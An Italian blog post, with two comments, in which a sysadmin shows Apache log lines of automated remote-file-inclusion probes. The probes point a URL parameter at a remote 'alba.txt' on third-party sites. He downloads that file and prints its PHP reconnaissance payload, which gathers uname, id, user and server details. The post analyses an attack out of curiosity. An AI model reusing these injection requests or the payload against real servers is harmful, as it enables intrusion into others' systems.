spulciando i log
Questo pomeriggio, dato che a lavoro mi annoiavo un pò, mi sono messo a spulciare l’access log di apache.. e tra le varie richieste assurde ho notato queste:
69.93.255.250 - - [01/Apr/2008:08:46:01 +0200] "GET
//t-counter/t_countpro.cgi?view//portfolio/msg/view.php?
av=http://www.simpa.es/includes/data/alba.txt???
HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
69.93.255.250 - - [01/Apr/2008:08:46:01 +0200] "GET
//t-counter/t_countpro.cgi?view//portfolio/msg/view.php?
av=http://www.simpa.es/includes/data/alba.txt???
HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
75.118.25.104 - - [01/Apr/2008:08:46:57 +0200] "GET
//t-counter/t_countpro.cgi?view//portfolio/msg/view.php?
av=http://www.simpa.es/includes/data/alba.txt???
HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
62.149.36.33 - - [01/Apr/2008:08:56:59 +0200] "GET
//t-counter/t_countpro.cgi?view//portfolio/msg/view.php?
av=http://www.silak.eu//components/com_rwcard/alba.txt???
HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
62.149.36.33 - - [01/Apr/2008:08:56:59 +0200] "GET
//t-counter/t_countpro.cgi?view//portfolio/msg/view.php?
av=http://www.silak.eu//components/com_rwcard/alba.txt???
HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
incuriosito da che file cercasse di scaricarsi sul mio server ho fatto io il download visto che lui non ci riusciva (code 404):
root@ajna /tmp # wget http://www.silak.eu//components/com_rwcard/alba.txt
--15:28:29-- http://www.silak.eu//components/com_rwcard/alba.txt
=> `alba.txt'
Resolving www.silak.eu... 82.119.241.4
Connecting to www.silak.eu|82.119.241.4|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 614 [text/plain]
100%[================================>] 614 --.--K/s
15:28:29 (97.59 MB/s) - `alba.txt' saved [614/614]
root@ajna /tmp # cat alba.txt
echo "ALBANIA< br >";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os< br >";
echo "uname -a: $alb< br >";
echo "uptime: $alb2< br >";
echo "id: $alb3< br >";
echo "pwd: $alb4< br >";
echo "user: $alb9< br >";
echo "phpv: $alb6< br >";
echo "SoftWare: $alb5< br >";
echo "ServerName: $alb7< br >";
echo "ServerAddr: $alb8< br >";
echo "UNITED ALBANIANS aka ALBOSS PARADISE< br >";
exit;
?>
root@ajna /tmp #
Ironico il destino, proprio a me doveva capitare questo tentativo di craking :)
Sorella, tu non sei nerd ma filosofa.. è ovvio che non mi capisci!! :)
ciao
Certe volte parli un’altra lingua…Sei sicuro di essere mio fratello?
Fra
Sono bot che girano il web in automatico. Passano di frequente anche da me… cercano qualche falla che automaticamente vada a recuperare informazioni per bucare i server…
Ciao,
Emanuele